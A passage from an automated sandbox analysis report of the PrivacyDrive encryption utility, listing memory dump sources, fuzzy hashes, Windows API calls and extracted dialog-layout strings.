                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$DriveType
                                • String ID: :\$<Auto>
                                • API String ID: 129741658-344299042
                                • Opcode ID: b8ddd7b521215fcdb81aad0286e10ce68196148bf62929d77c5700f32a467ccd
                                • Instruction ID: 670246f387c8d48888569e4ee580ab8f7c55ca62465a6d09409616b72b2d666d
                                • Opcode Fuzzy Hash: b8ddd7b521215fcdb81aad0286e10ce68196148bf62929d77c5700f32a467ccd
                                • Instruction Fuzzy Hash: FDC1D171B043028BD71CDF28D995B6AB7E1FB99314F044A2EE8568B390E735F901CB86
                                APIs
                                • PostMessageW.USER32(?,0000060B,00000000,00000000), ref: 0044B75D
                                • GetDriveTypeW.KERNEL32(?,<Auto>), ref: 0044B7CC
                                  • Part of subcall function 004D8DA0: PostMessageW.USER32(?,0000060B,00000000,00000000), ref: 004D8DEB
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: MessagePost$DriveType
                                • String ID: :\$<Auto>
                                • API String ID: 129741658-344299042
                                • Opcode ID: e667c96cbd3dcbc894ac72835a70f270566adb8cc087ce17208f137fb7a18532
                                • Instruction ID: abe8a8f07e6a4767f565cdd3afb6a6e4ae45aea80453094aa552e8fe809eb480
                                • Opcode Fuzzy Hash: e667c96cbd3dcbc894ac72835a70f270566adb8cc087ce17208f137fb7a18532
                                • Instruction Fuzzy Hash: 57C1D0717046068BE71CDF28C991B6AB7E5FB95318F044A2EE8569B390E739F800CB85
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: Exception@8Throwstd::exception::exception
                                • String ID: $ $invalid string position$string too long
                                • API String ID: 3728558374-2421040362
                                • Opcode ID: 3b1f94731725840e9b62b2c1c4a543a432ed2d063aae62488a6fdccc3f2e47d3
                                • Instruction ID: 494470787c36d555f456704b80f195302d1a24c544c43fcfa66fa7cc26baed73
                                • Opcode Fuzzy Hash: 3b1f94731725840e9b62b2c1c4a543a432ed2d063aae62488a6fdccc3f2e47d3
                                • Instruction Fuzzy Hash: 73529D706083509FD720CF24D884B5BBBF5BF85708F50492EF499872A1DB78E989CB5A
                                APIs
                                • FindFirstFileW.KERNEL32(?,?,7563D392,005BE234,00000000), ref: 00477CC7
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: FileFindFirst
                                • String ID: !@$\\?\
                                • API String ID: 1974802433-284777618
                                • Opcode ID: 9f54e74c447d8c1471aced9ddb5f856f13ca63166a6612e6d683e47195cf3d02
                                • Instruction ID: e479698cf5783f51cc95c1af72369fdedfa0ef32618485642a610c0e3e122e49
                                • Opcode Fuzzy Hash: 9f54e74c447d8c1471aced9ddb5f856f13ca63166a6612e6d683e47195cf3d02
                                • Instruction Fuzzy Hash: 2D3179B1D00208DFDB00DFA8D949BDEBBB4FF08318F10812AE415B7290E7756A48CBA5
                                APIs
                                • _memset.LIBCMT ref: 004A83E7
                                • _memset.LIBCMT ref: 004A8486
                                • GetVersionExW.KERNEL32(00000114,?,00000110,005BDDE8,00000000,000003B8), ref: 004A8495
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: _memset$Version
                                • String ID:
                                • API String ID: 4269076227-0
                                • Opcode ID: 8922782234a070395409a056d08c634cf9ebdebe735c7a74e74746dd8037a47f
                                • Instruction ID: cffd5edc1071be8adafd083d010df601be350e95cc5998e68f80b562165eefa8
                                • Opcode Fuzzy Hash: 8922782234a070395409a056d08c634cf9ebdebe735c7a74e74746dd8037a47f
                                • Instruction Fuzzy Hash: 4B213EB05017098BE724DF20D95A7DAB7F8FB04308F00459ED65A5B280DBFA2788CF94
                                APIs
                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,?,00571F54,00000000,?,0056C344,7563D392,7563D392,005BDD7C), ref: 004C2D7C
                                • WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?,?,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2ACF
                                  • Part of subcall function 00436AE0: WideCharToMultiByte.KERNEL32(76ECFFB0,00000000,?,000000FF,?,?,00000000,00000000,?,?,004C27B9,?,00000003,?,00583B28,00000000), ref: 00436B01
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ByteCharMultiWide
                                • String ID:
                                • API String ID: 626452242-0
                                • Opcode ID: 89d3db8c149bdafcf33274edead6d687ce256ebbcfcec9e35c2dc3bc495bdc06
                                • Instruction ID: 873e9d19a2d95d0aa00dd28e92f9f7c76caf2888d9f80e7c198700b777126157
                                • Opcode Fuzzy Hash: 89d3db8c149bdafcf33274edead6d687ce256ebbcfcec9e35c2dc3bc495bdc06
                                • Instruction Fuzzy Hash: C2121639A002198BDF60DF68C945BEFBAB5AF88304F14055DD806B7381DBF45E46CBA5
                                APIs
                                • GetLocalTime.KERNEL32(?,005BE234,?,?,?,?,004B2331,?,?,005BE234,?,0040FFE5,005BE28C), ref: 00414217
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: LocalTime
                                • String ID: 1#K
                                • API String ID: 481472006-2236594636
                                • Opcode ID: 4b978a7c4557ab56677d0698089e8ae6965c50f750a790ab8a43691735895946
                                • Instruction ID: 7557a5d90c1e74fc617b9f9402ec226dbaf9c5c510acc9c2584aebe65ea47851
                                • Opcode Fuzzy Hash: 4b978a7c4557ab56677d0698089e8ae6965c50f750a790ab8a43691735895946
                                • Instruction Fuzzy Hash: ADF0A0B490021C8B8B14EF59D9440BEB7F8FF08701B00006EEC4293340EA78AA04D765
                                Strings
                                • demo, xrefs: 0044AE2E
                                • XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX, xrefs: 0044AD12
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID:
                                • String ID: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX$demo
                                • API String ID: 0-3020961311
                                • Opcode ID: a4d093869b1d3facbb1607af297186a8d5a9fa8d2d69c1ecb9946b666672a5c9
                                • Instruction ID: e04dcd71fbb527aa0d6c734396308bc0a31704afe8eaa3013249135674da03c8
                                • Opcode Fuzzy Hash: a4d093869b1d3facbb1607af297186a8d5a9fa8d2d69c1ecb9946b666672a5c9
                                • Instruction Fuzzy Hash: 5C624C70604B029FE718CF29C884BA6BBE1FF88304F04465EE5A99B3A1D775F855CB85
                                APIs
                                • RpcBindingFree.RPCRT4(005C0BE4), ref: 0040D06E
                                • LeaveCriticalSection.KERNEL32(005BE514), ref: 0040D089
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: BindingCriticalFreeLeaveSection
                                • String ID:
                                • API String ID: 638364315-0
                                • Opcode ID: c87a35ca71cc180f8364abb0b1cd667d1664c64db99ffdf2cbf6e8ee3bb5ecf9
                                • Instruction ID: bcf578403d51454ece27bc4aca4f94fa89a7d6a3adb0dc5b80eb713e033b389d
                                • Opcode Fuzzy Hash: c87a35ca71cc180f8364abb0b1cd667d1664c64db99ffdf2cbf6e8ee3bb5ecf9
                                • Instruction Fuzzy Hash: 6CE0C979904705CFC710CF94E94579EF7B0FB44325F50065ADD2553790D73568058B50
                                APIs
                                • SetUnhandledExceptionFilter.KERNEL32(00000000,7563D392,00503714,7563D06A,?,?,00000001), ref: 005070A1
                                • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 005070AA
                                Memory Dump Source
                                • Source File: 00000004.00000002.2151000418.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000004.00000002.2150978302.0000000000400000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151132618.0000000000552000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151182878.00000000005AC000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151210226.00000000005AD000.00000008.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005BA000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151306605.00000000005C0000.00000004.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005C1000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.00000000005CB000.00000002.00000001.01000000.00000006.sdmp
                                • Associated: 00000004.00000002.2151352259.0000000000601000.00000002.00000001.01000000.00000006.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_PrivacyDrive.jbxd
                                Similarity
                                • API ID: ExceptionFilterUnhandled
                                • String ID:
                                • API String ID: 3192549508-0
                                APIs
                                • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 004E9420
                                Similarity
                                • API ID: InfoParametersSystem
                                • String ID:
                                • API String ID: 3098949447-0
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0043C870
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043C888
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CREATE_VOLUME), ref: 0043C8B5
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043C8C7
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,CREATE_VOLUME), ref: 0043C8F4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0043C906
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: CREATE_VOLUME$Dialog$PM_ALIGN_LEFT$PM_CANCEL_BUTTON_BOTTOM$PM_CANCEL_BUTTON_RIGHT$PM_CANCEL_BUTTON_WIDTH$PM_CHECK_ADD_TO_FAVORITES_X$PM_CHECK_ADD_TO_FAVORITES_Y$PM_CHECK_MOUNT_AND_FORMAT_X$PM_CHECK_MOUNT_AND_FORMAT_Y$PM_CHECK_RANDOM_DATA_X$PM_CHECK_RANDOM_DATA_Y$PM_CHECK_SHOW_PW_X$PM_CHECK_SHOW_PW_Y$PM_CREATE_BUTTON_BOTTOM$PM_CREATE_BUTTON_RIGHT$PM_CREATE_BUTTON_WIDTH$PM_EDIT_DESCRIPTION_X$PM_EDIT_DESCRIPTION_Y$PM_EDIT_DIR_X$PM_EDIT_DIR_Y$PM_EDIT_FILENAME_X$PM_EDIT_FILENAME_Y$PM_EDIT_PASSWORD1_WIDTH$PM_EDIT_PASSWORD1_X$PM_EDIT_PASSWORD1_Y$PM_EDIT_PASSWORD2_WIDTH$PM_EDIT_PASSWORD2_X$PM_EDIT_PASSWORD2_Y$PM_EDIT_SIZE_WIDTH$PM_EDIT_SIZE_X$PM_EDIT_SIZE_Y$PM_GROUPLINE_ENCRYPTION_OPTIONS_Y$PM_GROUPLINE_PASSWORD_SETTINGS_Y$PM_GROUPLINE_VOLUME_FILE_Y$PM_ICON_X$PM_ICON_Y$PM_LABEL_FILE_X$PM_LABEL_FILE_Y$PM_LABEL_OFFSET_X$PM_LABEL_OFFSET_Y$PM_LIST_ALGORITHM_MENU_WIDTH$PM_LIST_ALGORITHM_WIDTH$PM_LIST_ALGORITHM_X$PM_LIST_ALGORITHM_Y$PM_LIST_CIPHER_MODE_MENU_WIDTH$PM_LIST_CIPHER_MODE_WIDTH$PM_LIST_CIPHER_MODE_X$PM_LIST_CIPHER_MODE_Y$PM_LIST_DRIVE_LETTER_MENU_WIDTH$PM_LIST_DRIVE_LETTER_WIDTH$PM_LIST_DRIVE_LETTER_X$PM_LIST_DRIVE_LETTER_Y$PM_LIST_HASH_ALGORITHM_MENU_WIDTH$PM_LIST_HASH_ALGORITHM_WIDTH$PM_LIST_HASH_ALGORITHM_X$PM_LIST_HASH_ALGORITHM_Y$PM_LIST_MENU_WIDTH$PM_LIST_MOUNT_AS_MENU_WIDTH$PM_LIST_MOUNT_AS_WIDTH$PM_LIST_MOUNT_AS_X$PM_LIST_MOUNT_AS_Y$PM_LIST_SIZE_X$PM_LIST_SIZE_Y$PM_LIST_WIDTH
                                • API String ID: 904232820-8767612
                                APIs
                                  • Part of subcall function 004FFCFE: _malloc.LIBCMT ref: 004FFD16
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0042A8EF
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042A902
                                  • Part of subcall function 0042B290: EnterCriticalSection.KERNEL32(005BDCE4,00000000,0042AB00,00000050,0056C344), ref: 0042B29C
                                  • Part of subcall function 0042B290: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042B2AF
                                  • Part of subcall function 0042B450: EnterCriticalSection.KERNEL32(005BDCE4,00000000,0042ABA5,00000011,_pm_WINDOW_FRAME_FILLET,00000050,0056C344), ref: 0042B458
                                  • Part of subcall function 0042B450: LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0042B46B
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$_malloc
                                • String ID: COMMON_1|DISABLED$COMMON_1|HIT_BLUE$COMMON_1|HIT_GRAY$COMMON_1|HIT_YELLOW$COMMON_1|NORMAL$COMMON_1|PUSH_BLUE$COMMON_1|PUSH_GRAY$COMMON_1|PUSH_YELLOW$Common$_IMG_MENU_ICON_ADD$_IMG_MENU_ICON_EXIT$_IMG_MENU_ICON_EXPLORER$_IMG_MENU_ICON_FACEBOOK$_IMG_MENU_ICON_HOME$_IMG_MENU_ICON_PROGRAM$_IMG_MENU_ICON_REFRESH$_IMG_MENU_ICON_REMOVE$_IMG_MENU_ICON_SETTINGS$_IMG_MENU_ICON_TWITTER$_cr_CRL_BACKGROUND_BEGIN$_cr_CRL_BACKGROUND_END$_cr_CRL_BORDER_HIGH$_cr_CRL_BORDER_LOW$_cr_CRL_DEFAULT_LINE$_cr_CRL_FOCUS_LINT$_cr_CRL_GLISTEN_BEGIN$_cr_CRL_GLISTEN_CENTER$_cr_CRL_GLISTEN_END$_cr_CRL_TEXT_HIGH$_cr_CRL_TEXT_LOW$_cr_LINE_HIGH_1$_cr_LINE_HIGH_2$_cr_LINE_HIGH_3$_cr_LINE_LOW_1$_cr_LINE_LOW_2$_cr_LINE_LOW_3$_cr_TEXT_HIGH_1$_cr_TEXT_HIGH_2$_cr_TEXT_HIGH_3$_cr_TEXT_LOW_1$_cr_TEXT_LOW_2$_cr_TEXT_LOW_3$_cr_WINDOW_BACKGROUND$_cr_WINDOW_TITLE_BACKGROUND_BEGIN$_cr_WINDOW_TITLE_BACKGROUND_END$_cr_WINDOW_TITLE_TEXT$_img_TEXTURE_1$_img_TEXTURE_2$_img_TEXTURE_3$_img_TEXTURE_4$_img_TEXTURE_5$_pm_CONTROL_FILLET$_pm_WINDOW_FRAME_FILLET$_pm_WINDOW_SHADOW_BOTTOM$_pm_WINDOW_SHADOW_FILLET$_pm_WINDOW_SHADOW_LEFT$_pm_WINDOW_SHADOW_RIGHT$_pm_WINDOW_SHADOW_TOP
                                • API String ID: 362512214-366870267
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00451330
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00451348
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SETTINGS), ref: 00451375
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00451387
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,SETTINGS), ref: 004513B4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004513C6
                                  • Part of subcall function 0041EF30: EnterCriticalSection.KERNEL32(005BDCE4,?,?,0041DE61,Button\State,LABEL_BUTTON|NORMAL,00000001,PM_FILLET,00000000,PM_HEIGHT,00000000,Button,?,LABEL_BUTTON,?,?), ref: 0041EF3B
                                  • Part of subcall function 0041EF30: LeaveCriticalSection.KERNEL32(005BDCE4,?,0041DE61,Button\State,LABEL_BUTTON|NORMAL,00000001,PM_FILLET,00000000,PM_HEIGHT,00000000,Button,?,LABEL_BUTTON,?,?,0041E1DB), ref: 0041EF4E
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: BACKGROUND_BEGIN$BACKGROUND_END$BORDER$BORDER_HL$BUTTON_RESTROE_WIDTH$DISMOUNT$DISMOUNT_SEL$Dialog$Dialog\TabbarFrame$ENCRYPTION$ENCRYPTION_SEL$FILE_ASSOCIATION$FILE_ASSOCIATION_SEL$GENERAL$GENERAL_SEL$HEIGHT$HOTKEYS$HOTKEYS_SEL$MOUNT$MOUNT_SEL$PAGE_X$PAGE_Y$PRIVACY$PRIVACY_SEL$SETTINGS$SETTINGS|$TABBAR_SELECTED$TABBUTTON_HEIGHT$TABBUTTON_LEFT$TABBUTTON_TOP$TABBUTTON_WIDTH$USER_INTERFACE$USER_INTERFACE_SEL$WIDTH
                                • API String ID: 904232820-2028568477
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 0044A3D0
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0044A3E8
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,MOUNT_VOLUME), ref: 0044A415
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0044A427
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Dialog,?,MOUNT_VOLUME), ref: 0044A454
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 0044A466
                                Strings
                                Similarity
                                • API ID: CriticalSection$EnterLeave$ByteCharMultiWide
                                • String ID: Dialog$MOUNT_VOLUME$PM_CHECKBOX_OPEN_EXPLORER_X$PM_CHECKBOX_OPEN_EXPLORER_Y$PM_CHECKBOX_READONLY_X$PM_CHECKBOX_READONLY_Y$PM_CHECKBOX_SHOW_PASSWORD_X$PM_CHECKBOX_SHOW_PASSWORD_Y$PM_EDIT_FILENAME_WIDTH$PM_EDIT_FILENAME_X$PM_EDIT_FILENAME_Y$PM_EDIT_KEYFILE_WIDTH$PM_EDIT_KEYFILE_X$PM_EDIT_KEYFILE_Y$PM_EDIT_PASSWORD_WIDTH$PM_EDIT_PASSWORD_X$PM_EDIT_PASSWORD_Y$PM_GROUPLINE_MOUNT_OPTIONS_Y$PM_GROUPLINE_PASSWORD_Y$PM_GROUPLINE_VOLUME_Y$PM_ICON_LEFT$PM_ICON_TOP$PM_LABEL_OFFSET_X$PM_LABEL_OFFSET_Y$PM_LIST_DRIVE_LETTER_MENU_WIDTH$PM_LIST_DRIVE_LETTER_WIDTH$PM_LIST_DRIVE_LETTER_X$PM_LIST_DRIVE_LETTER_Y$PM_LIST_MOUNT_AS_MENU_WIDTH$PM_LIST_MOUNT_AS_WIDTH$PM_LIST_MOUNT_AS_X$PM_LIST_MOUNT_AS_Y$PM_STRINFO_Y
                                • API String ID: 904232820-2220584259
                                APIs
                                • EnterCriticalSection.KERNEL32(005BDCE4), ref: 00422920
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00422938
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD), ref: 00422965
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 00422977
                                  • Part of subcall function 004C24A0: WideCharToMultiByte.KERNEL32(00000003,00000000,?,000000FF,?, v,00000000,00000000,00000000,?,00000000,?,00000003,?,00583B28,00000000), ref: 004C2699
                                • EnterCriticalSection.KERNEL32(005BDCE4,00000000,Edit,?,STANDARD), ref: 004229A4
                                • LeaveCriticalSection.KERNEL32(005BDCE4), ref: 004229B6
                                  • Part of subcall function 00424910: EnterCriticalSection.KERNEL32(005BDCE4,?,?,?,004A01A9,Dialog\Button,BASE_DIALOG|CLOSE,0000000C,INACTIVATE_TITLE_TEXT,0000000B,INACTIVATE_TITLE_END,0000000A,INACTIVATE_TITLE_BEGIN,00000009,ACTIVATE_TITLE_END,00000008), ref: 0042491C
